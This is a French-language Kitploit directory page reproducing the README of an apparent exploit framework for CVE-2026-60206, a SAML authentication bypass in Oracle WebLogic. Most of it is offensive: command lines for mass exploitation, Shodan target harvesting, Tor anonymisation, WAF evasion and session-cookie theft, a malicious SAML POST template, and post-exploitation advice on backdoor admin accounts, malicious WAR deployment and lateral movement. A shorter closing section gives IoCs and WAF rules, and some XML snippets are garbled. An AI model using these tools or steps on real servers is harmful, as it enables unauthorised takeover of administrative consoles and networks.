Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-60206-PoC-Exploit — 👾 CVE-2026-60206 - Framework d'exploitation du contournement d'authentification SAML Oracle WebLogic ⚡Versions Bash et Python. Fonctionnalités : --detect vérification sûre, --exploit combo/unsigned/xsw/nameid/all, intégration --shodan, prise en charge de --tor, analyse en masse, sortie JSON/CSV/JSONL, validation des cookies. 🛡️ CVSS 9.9 Critique - Utilisation éthique, restez dans la légalité. 🔒 | Kitploit
Outils/GitHubGitHub/tc4dy/cve-2026-60206-poc-exploit
Authentification et AutorisationFrameworks d'ExploitationGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsPost-ExploitationContournement de WAF

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Tests d'Intrusion
Red Teaming
GitHubtc4dy/cve-2026-60206-poc-exploit

CVE-2026-60206-PoC-Exploit

Voir le dépôt
423il y a 1 moisPas encore vérifié

À propos

👾 CVE-2026-60206 - Framework d'exploitation du contournement d'authentification SAML Oracle WebLogic ⚡Versions Bash et Python. Fonctionnalités : --detect vérification sûre, --exploit combo/unsigned/xsw/nameid/all, intégration --shodan, prise en charge de --tor, analyse en masse, sortie JSON/CSV/JSONL, validation des cookies. 🛡️ CVSS 9.9 Critique - Utilisation éthique, restez dans la légalité. 🔒

Partager

CVE-2026-60206

CVE-2026-60206 - Framework-Toolkit d'exploitation du contournement d'authentification SAML Oracle WebLogic

CVE-2026-60206 CVSS 9.9 CISA KEV Python 3.6+

Pre-Auth Bypass SAML Injection Admin Access

lowpriv
Cross-Platform

Oracle WebLogic Server — Contournement de l'authentification SAML → Prise de contrôle admin

Framework d'exploitation et scanner de masse
Pour tests de sécurité autorisés uniquement.


⚖️ Avertissement légal et usage responsable

Cet outil est fourni uniquement à des fins éducatives et de tests d'intrusion autorisés.

Les auteurs et contributeurs ne sont pas responsables de tout usage abusif ou dommage causé par ce logiciel. Les utilisateurs sont seuls responsables de s'assurer qu'ils disposent d'une autorisation écrite explicite du propriétaire de la cible avant tout test. L'accès non autorisé à des systèmes informatiques est illégal en vertu du Computer Fraud and Abuse Act (CFAA) et des lois similaires dans le monde entier.

En utilisant ce logiciel, vous acceptez de :

  • L'utiliser uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous disposez d'une autorisation explicite de test.
  • Vous conformer à toutes les lois locales, régionales et fédérales applicables.
  • Ne pas l'utiliser pour des activités malveillantes, destructrices ou illégales.

⚠️ AVERTISSEMENT : Cette vulnérabilité est activement exploitée dans la nature. Toute utilisation non autorisée peut entraîner de graves conséquences juridiques.


[+!] Présentation de la vulnérabilité

CVE-2026-60206 est une vulnérabilité critique de contournement d'authentification non authentifié dans l'implémentation SAML (Security Assertion Markup Language) d'Oracle WebLogic Server. Elle permet à des attaquants distants de contourner l'authentification SAML et d'obtenir un accès administratif à la console WebLogic sans identifiants valides.

Comment cela fonctionne :

  1. Injection SAML : La vulnérabilité provient d'une validation incorrecte des assertions SAML. Les attaquants peuvent concevoir des réponses SAML malveillantes qui contournent les contrôles d'authentification.

  2. Contournement de signature : La vulnérabilité permet de contourner la validation des signatures XML via des attaques XML Signature Wrapping (XSW), où les attaquants enveloppent des assertions malveillantes avec des signatures légitimes.

  3. Manipulation du NameID : Les attaquants peuvent injecter des commentaires ou manipuler le champ NameID pour usurper l'identité d'utilisateurs privilégiés.

  4. Accès administrateur : Une exploitation réussie accorde à l'attaquant un accès administratif à la console WebLogic Server avec un contrôle total.

Faits clés :

AttributeValue
📅 DécouverteJuillet 2026 (CPU Oracle)
⚠️ Score CVSS9.9 (CRITIQUE)
📋 CISA KEVAjouté le 21 juillet 2026
🎯 Produits concernésOracle WebLogic Server (Fusion Middleware)
🔄 Versions corrigéesCPU Oracle juillet 2026
🔓 AuthentificationNon requise (Pre-Auth)
🌍 Exploitation activeConfirmée dans la nature (juillet 2026)

🛠️ Framework d'exploitation

Le multi-exploit éducatif complet enchaîne plusieurs vecteurs d'attaque SAML pour parvenir à un contournement d'authentification, avec des fonctionnalités avancées pour le scan de masse, le vol de cookie et l'accès administratif.

✨ Fonctionnalités

FeatureDescription
🚀 Exploit multi-vecteurs7 vecteurs d'attaque : unsigned, xsw_v1-4, nameid, combo
💻 Scan de masseScan concurrent avec pool de threads (Python) / FIFO (Bash)
🔐 Vol de cookieVole le JSESSIONID pour le détournement de session
👑 Accès à la console d'administrationAccès administratif complet à la console WebLogic
📁 Détection de versionDétecte les versions de WebLogic et le statut de vulnérabilité
🌐 Scan par lotsExploitation de masse de plusieurs cibles avec threading
🎯 Détection sûreOption --detect facultative pour la vérification non intrusive de la vulnérabilité
🧩 Intégration ShodanChargement des cibles directement depuis une recherche Shodan
🔍 Support TorAnonymisez les scans avec le proxy Tor
📊 Formats de sortie multiplesSortie JSON, CSV, JSONL en streaming
🪟 Multi-plateformePrend en charge Linux, macOS, BSD, Alpine, WSL
🔒 Thread-safeUtilise des mécanismes de verrouillage pour les opérations concurrentes
📋 Enregistrement automatique de sessionSauvegarde les cookies valides pour une utilisation ultérieure
⚙️ Contournement WAFRotation du User-Agent et délais aléatoires

Vecteurs d'attaque

VectorDescription
unsignedAssertion SAML non authentifiée sans signature
xsw_v1XML Signature Wrapping - Assertions multiples
xsw_v2XSW - Contournement de signature enveloppée
xsw_v3XSW - Manipulation d'espace de noms
xsw_v4XSW - Injection d'assertions multiples
nameidInjection de commentaires NameID
comboAttaque combinée (unsigned + XSW + NameID)

🕵️ Vérificateur sûr (--detect)

Le vérificateur sûr effectue une détection de vulnérabilité non intrusive sans exécuter de charges utiles malveillantes ni apporter de modifications au système.

✨ Fonctionnalités

FeatureDescription
🔍 Détection WebLogicIdentifie les instances WebLogic via LoginForm.jsp
📊 Détection de versionDétecte les versions WebLogic spécifiques et les niveaux de correctifs
🧪 Découverte de points de terminaison SAMLTeste les points de terminaison SAML ACS
🔒 Non intrusifIdentifie uniquement les versions vulnérables
📋 Sortie JSON/CSVExporte les résultats pour les rapports
🔄 Scan de masseScanne plusieurs cibles avec prise en charge du threading

📦 Installation et prérequis

Prérequis

  • Python 3.6+ ou Bash 3.2+
  • curl (pour la version Bash)
  • pip (pour la bibliothèque requests, version Python)

Installer les dépendances

root@kitploit:~
# Python version
pip install requests urllib3

# Optional: Shodan support
pip install shodan

# Bash version: curl only (no additional dependencies)

[!NOTE] La version Bash fonctionne avec curl uniquement et ne possède aucune dépendance externe. La version Python nécessite requests et urllib3 (facultatif : shodan pour l'intégration Shodan).


🚀 Exemples d'utilisation

[1] Framework d'exploitation Python (exploit.py)

root@kitploit:~
# Single target exploit (combo mode)
python exploit.py -u https://192.168.1.100:7002 --exploit --user admin

# Exploit with all attack vectors
python exploit.py -u https://192.168.1.100:7002 --mode all --exploit -v

# Mass scanning from file (50 threads)
python exploit.py -l targets.txt --exploit -t 50 -o results.json

# Safe detection only (non-intrusive)
python exploit.py -l targets.txt --detect -o scan_results.csv

# Shodan integration
export SHODAN_API_KEY="your_api_key"
python exploit.py --shodan --shodan-query "WebLogic Server port:7002" --exploit

# Tor anonymized scanning
python exploit.py -l targets.txt --exploit --tor -t 20

# Proxy support
python exploit.py -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080

# Streaming JSONL output (memory efficient for large scans)
python exploit.py -l targets.txt --exploit -o results.jsonl

# Quiet mode (minimal output)
python exploit.py -l targets.txt --exploit -q -o results.json

# Custom timeout and retry
python exploit.py -u https://192.168.1.100:7002 --exploit --timeout 20 --retry 5 --delay 2.0

# SSL verification bypass
python exploit.py -u https://192.168.1.100:7002 --exploit --no-verify

# Verbose debugging
python exploit.py -u https://192.168.1.100:7002 --exploit -v

[2] Framework d'exploitation Bash (exploit.sh)

root@kitploit:~
# Single target exploit
./exploit.sh -u https://192.168.1.100:7002 --exploit --user admin

# Mass scanning
./exploit.sh -l targets.txt --mode all --exploit -o results.json

# Tor anonymized scanning
./exploit.sh -l targets.txt --exploit --tor -t 20

# Shodan integration
export SHODAN_API_KEY="your_api_key"
./exploit.sh --shodan --exploit -o shodan_results.json

# Streaming JSONL output
./exploit.sh -l targets.txt --exploit -o results.jsonl

# Proxy support
./exploit.sh -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080

# SSL verification bypass
./exploit.sh -u https://192.168.1.100:7002 --exploit --no-verify

# Quiet mode
./exploit.sh -l targets.txt --exploit -q -o results.json

# Verbose debugging
./exploit.sh -u https://192.168.1.100:7002 --exploit -v

[3] Validateur de base (verifier_poc.sh)

root@kitploit:~
# Single target validation
./verifier_poc.sh -u https://192.168.1.100:7002 --user admin

# Mass validation with report
./verifier_poc.sh -l targets.txt --user admin -o report.txt

# SSL verification bypass
./verifier_poc.sh -u https://192.168.1.100:7002 --no-verify

# Proxy support
./verifier_poc.sh -u https://192.168.1.100:7002 --proxy http://127.0.0.1:8080

🎯 Versions concernées

Oracle WebLogic VersionStatus
12.2.1.4.0🔴 VULNÉRABLE
14.1.1.0.0🔴 VULNÉRABLE
14.1.2.0.0🔴 VULNÉRABLE
15.1.1.0.0🔴 VULNÉRABLE
Autres versionsConsultez le CPU Oracle de juillet 2026

⚠️ Important : Cette vulnérabilité affecte les déploiements WebLogic Server auto-hébergés. Appliquez immédiatement le CPU Oracle de juillet 2026.


🧠 Plongée technique approfondie

1. Contournement de l'authentification SAML

La vulnérabilité permet aux attaquants de contourner l'authentification SAML en concevant des réponses SAML malveillantes qui sont incorrectement validées par l'implémentation SAML de WebLogic.

Point de terminaison vulnérable :

root@kitploit:~
POST /saml2/sp/acs HTTP/1.1
Host: target:7002
Content-Type: application/x-www-form-urlencoded

SAMLResponse=<base64_encoded_malicious_assertion>&RelayState=/

2. Vecteurs d'attaque

Assertion non signée

saml2:Assertion saml2:Subject <saml2:NameID Format="...">admin</saml2:NameID> </saml2:Subject>

</saml2:Assertion>

Enveloppement de signature XML (XSW)

ds:Signature <ds:Reference URI="#legit"> </ds:Reference> </ds:Signature>

<saml2:Assertion ID="evil"> saml2:Subjectadmin</saml2:Subject> </saml2:Assertion>

Injection de commentaires NameID

<saml2:NameID Format="...">

</saml2:NameID>

3. Post-exploitation

Vol de cookie

Une exploitation réussie produit un cookie JSESSIONID, accordant un accès administratif à la console WebLogic.

Détournement de session

Le cookie volé peut être utilisé pour accéder à :

  • Console d'administration WebLogic
  • Déployer/désinstaller des applications
  • Accéder aux ressources JNDI
  • Exécuter des commandes arbitraires via JMX

Persistance

  • Déployer des applications malveillantes (fichiers WAR)
  • Créer des utilisateurs administrateur backdoor
  • Installer des outils d'accès à distance

Mouvement latéral

  • Accéder à d'autres serveurs du réseau via des identifiants volés
  • Exploiter les relations de confiance entre WebLogic et d'autres systèmes
  • Pivoter vers les réseaux internes

🔍 Indicateurs de compromission (IoCs)

Analyse des journaux

Recherchez dans vos journaux WebLogic :

  • access.log – requêtes vers /saml2/sp/acs, /saml2/acs avec des paramètres SAML inhabituels
  • domain.log – tentatives de contournement d'authentification avec des assertions SAML invalides
  • diagnostic.log – erreurs d'analyse SAML ou échecs de validation de signature

Requêtes suspectes

  • Paramètres SAMLResponse contenant :
    • Plusieurs balises <saml2:Assertion>
    • Des commentaires dans les champs <saml2:NameID>
    • Des assertions non signées
    • Du XML malveillant encodé en Base64
    • javascript: ou eval() dans les paramètres

Fichiers

  • Fichiers de session inattendus dans les répertoires temporaires de WebLogic
  • Fichiers de configuration modifiés (config.xml, jps-config.xml)
  • Nouveaux fichiers WAR dans le répertoire autodeploy
  • Fichiers weblogic.security modifiés

Réseau

  • Connexions administratives non autorisées à la console WebLogic
  • Scans de ports inhabituels ciblant les points de terminaison SAML
  • Connexions sortantes du serveur WebLogic vers des IP inconnues
  • Connexions reverse shell sur des ports inhabituels

Processus

  • Processus Java inattendus
  • Processus shell générés depuis WebLogic
  • Connexions réseau de l'utilisateur WebLogic vers des hôtes externes

🛡️ Atténuation et remédiation

Actions immédiates

  1. Appliquez le CPU Oracle de juillet 2026 immédiatement
  2. Désactivez SAML s'il n'est pas activement utilisé
  3. Surveillez les points de terminaison SAML pour détecter toute activité suspecte
  4. Examinez les journaux d'accès pour détecter les tentatives d'exploitation
  5. Faites pivoter tous les identifiants sur les systèmes concernés

Actions à long terme

  1. Implémentez des règles WAF pour bloquer les requêtes SAML malveillantes
  2. Activez la validation des signatures SAML en mode strict
  3. Audits de sécurité réguliers des configurations WebLogic
  4. Segmentation du réseau pour limiter l'exposition de WebLogic
  5. Implémentez une surveillance SIEM pour les événements WebLogic

Règles WAF

root@kitploit:~
# Block SAML requests with multiple assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10001,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - Multiple SAML Assertions',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*<saml2:Assertion>.*"

# Block SAML requests with comments in NameID
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10002,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - NameID Comments',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:NameID.*<!--.*-->.*"

# Block unsigned SAML assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10003,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - Unsigned Assertion',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*(?!<ds:Signature>).*"

📚 Références

  • NVD - CVE-2026-60206
  • Avis Oracle Critical Patch Update - Juillet 2026
  • Catalogue CISA KEV
  • SecurityFocus - CVE-2026-60206
  • The Hacker News - Zero-Day WebLogic exploité

🔗 Autres exploits

  • CVE-2026-15409/15410 - SonicWall SMA1000 Multi-Exploit Framework
  • CVE-2026-6875 - ServiceNow Pre-Auth RCE Exploit Framework
  • CVE-2026-41091 - SolarFlare (RedSun) Microsoft Defender LPE
  • CVE-2026-57821 - Apache Fineract SQL Injection Toolkit
  • CVE-2026-41940 - cPanel/WHM Authentication Bypass
Télécharger l’outil